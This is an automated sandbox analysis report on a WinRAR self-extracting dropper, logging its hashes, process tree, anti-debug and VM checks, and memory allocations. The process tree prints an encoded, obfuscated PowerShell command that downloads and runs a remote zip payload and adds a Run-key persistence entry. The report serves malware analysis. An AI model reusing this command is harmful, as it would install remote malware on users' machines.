Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 20, 2023, 9:35 a.m.	April 20, 2023, 9:48 a.m.

Size	320.4KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`a3b8de651df55988ae8f38dbbc734b0c`
SHA256	`c9d2a196a3a7209755613e769531990104393b8e96971aa1d757e3ab84696f8b`
CRC32	`8DFDD8B5`
ssdeep	`6144:PgZiAEAO0sByNsAal3gVAWgS7/OhwjmWX+t4bfy:PgZXEAO/BUdG3gVdt7K7WX+t4bfy`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX IsPE32 - (no description) PE_Header_Zero - PE File Signature Antivirus - Contains references to security software Malicious_Library_Zero - Malicious_Library

4556qXbHiTtYxMXnMwXziAARUlvy.exe "C:\Users\test22\AppData\Local\Temp\4556qXbHiTtYxMXnMwXziAARUlvy.exe"
416
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming/new.ps1"
  2152
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBlAE4AdgBgADoAYABBAFAAcABEAEEAdABBAH0AOwAgACQAewBMAGAAaQBuAEsAfQA9ACgAIgB7ADEAfQB7ADQAfQB7ADcAfQB7ADIAfQB7ADUAfQB7ADYAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAHoAaQBwACcALAAnAGgAdAAnACwAJwAvAG0AZQBkAHAAYQAnACwAJwAyADMANAAyADEALgAnACwAJwB0AHAAcwA6ACcALAAnAHUALgBuAGUAdAAvACcALAAnADMAJwAsACcALwAnACkAOwAgACQAewBwAGAAQQBUAEgAfQA9ACQAewBFAE4AdgBgADoAYQBgAFAAUABEAGAAQQBUAEEAfQArACgAKAAoACIAewAwAH0AewAzAH0AewAxAH0AewA0AH0AewAyAH0AIgAgAC0AZgAnAHsAMAB9ACcALAAnAGkAbAAnACwAJwB6AGkAcAAnACwAJwBzACcALAAnAHAALgAnACkAKQAgAC0AZgBbAEMASABBAHIAXQA5ADIAKQA7ACAAJAB7AHAAWgBgAGkAUAB9AD0AJAB7AEUAYABOAHYAOgBhAGAAcABgAFAARABhAFQAQQB9ACsAKAAoACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAZQBhAG0AUwAzAHIAdgBlACcALAAnAGwAeABXAFQAJwAsACcAcgAnACkAKQAgACAALQByAEUAUABsAGEAYwBFACAAKABbAEMASABhAHIAXQAxADAAOAArAFsAQwBIAGEAcgBdADEAMgAwACsAWwBDAEgAYQByAF0AOAA3ACkALABbAEMASABhAHIAXQA5ADIAKQA7ACAAJgAoACIAewAxAH0AewAwAH0AewAzAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAHIAdAAtAEIAaQB0ACcALAAnAFMAdABhACcALAAnAGUAcgAnACwAJwBzAFQAcgBhAG4AJwAsACcAcwBmACcAKQAgAC0AUwBvAHUAcgBjAGUAIAAkAHsAbABpAGAATgBrAH0AIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAewBwAEEAYABUAEgAfQA7ACAALgAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAJwB4ACcALAAnAHAAYQBuAGQALQBhAHIAYwBoACcALAAnAGUAJwAsACcAaQB2ACcALAAnAGUAJwApACAALQBwAGEAdABoACAAKAAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbABwAC4AegBpAHAAJwAsACcATQBYAHMAJwAsACcALgBuACcAKQApACAAIAAtAEMAcgBlAHAATABhAGMAZQAnAG4ATQBYACcALABbAEMASABBAHIAXQA5ADIAKQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAUABgAHoAaQBwAH0AOwAgACQAewBGAGAATwBMAEQAfQA9AC4AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAGAAWgBJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsARgBgAE8ATABEAH0ALgAiAGEAYABUAFQAcgBpAGIAYABVAHQAYABFAHMAIgA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcASABpACcALAAnAGQAZABlAG4AJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAG8AJwAsACcAUgBlAG0AJwAsACcALQBJAHQAZQBtACcALAAnAHYAZQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABBAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBzAHQAYQByACcAKQAgACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAeABlACcALAAnAC4AJwAsACcAYwBsAGkAZQBuAHQAMwAyACcALAAnAGUAJwApADsAIAAkAHsAZgBzAGAAVAByAH0APQAkAHsAUAB6AGAASQBQAH0AKwAoACgAKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsANQB9AHsAMgB9ACIAIAAtAGYAIAAnADMAMgAuACcALAAnAHsAMAB9ACcALAAnAHgAZQAnACwAJwBjAGwAJwAsACcAaQBlAG4AdAAnACwAJwBlACcAKQApACAAIAAtAGYAIAAgAFsAQwBoAEEAUgBdADkAMgApADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQAnACwAJwBtAFAAJwAsACcAcgBvAHAAZQByAHQAeQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQAwAH0AewA1AH0AewAwAH0AewAxADMAfQB7ADEAfQB7ADMAfQB7ADgAfQB7ADkAfQB7ADYAfQB7ADQAfQB7ADEAMgB9AHsAMQAxAH0AewAyAH0AewA3AH0AIgAgAC0AZgAgACcAewAwAH0AJwAsACcATwBGAFQAVwBBACcALAAnAG8AbgB7ADAAJwAsACcAUgBFAHsAMAB9AE0AaQBjAHIAbwBzACcALAAnAEMAJwAsACcAOgAnACwAJwAwAH0AJwAsACcAfQBSAHUAbgAnACwAJwBvAGYAdAB7ADAAfQBXAGkAJwAsACcAbgBkAG8AdwBzAHsAJwAsACcASABLAEMAVQAnACwAJwBWAGUAcgBzAGkAJwAsACcAdQByAHIAZQBuAHQAJwAsACcAUwAnACkAKQAtAGYAWwBDAEgAQQBSAF0AOQAyACkAIAAtAE4AYQBtAGUAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYQBtACcALAAnAFMAMwByAHYAZQByACcALAAnAFQAZQAnACkAIAAtAFYAYQBsAHUAZQAgACQAewBmAHMAYABUAHIAfQAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAdAByAGkAbgBnACcAKQA7AA==
    2276

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 9:35 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 20, 2023, 9:35 a.m.			0	0
IsDebuggerPresent April 20, 2023, 9:35 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 20, 2023, 9:35 a.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 55 events)

Time & API	Arguments	Status	Return
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503808 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005035c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fec50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ff350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ff350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ff350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003fea10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 20, 2023, 9:35 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Allocates read-write-execute memory (usually to unpack itself) (50 out of 150 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02440000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72601000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72602000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02441000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02424000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02489000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02933000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02934000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02935000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02936000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
